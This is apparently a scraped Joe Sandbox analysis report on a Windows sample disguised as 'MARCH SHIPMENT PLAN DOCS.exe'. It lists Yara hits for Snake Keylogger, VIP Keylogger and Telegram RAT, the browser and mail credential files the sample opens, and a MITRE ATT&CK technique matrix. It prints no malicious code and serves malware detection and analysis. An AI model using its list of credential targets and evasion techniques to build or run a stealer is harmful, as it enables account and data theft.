Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Users\user\AppData\Roaming\PKjWaa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Users\user\AppData\Roaming\PKjWaa.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\	Jump to behavior
Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\PKjWaa.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3702397792.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 00000014.00000002.3705314207.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3706006228.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 20.2.PKjWaa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3705314207.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3706006228.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7948, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.3d38d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PKjWaa.exe.3e9b608.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.45a3b28.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3702417475.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1323725157.0000000003E9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.0000000003D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1282291335.00000000045A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 6276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MARCH SHIPMENT PLAN DOCS.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PKjWaa.exe PID: 7368, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MARCH SHIPMENT PLAN DOCS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
MARCH SHIPMENT PLAN DOCS.exe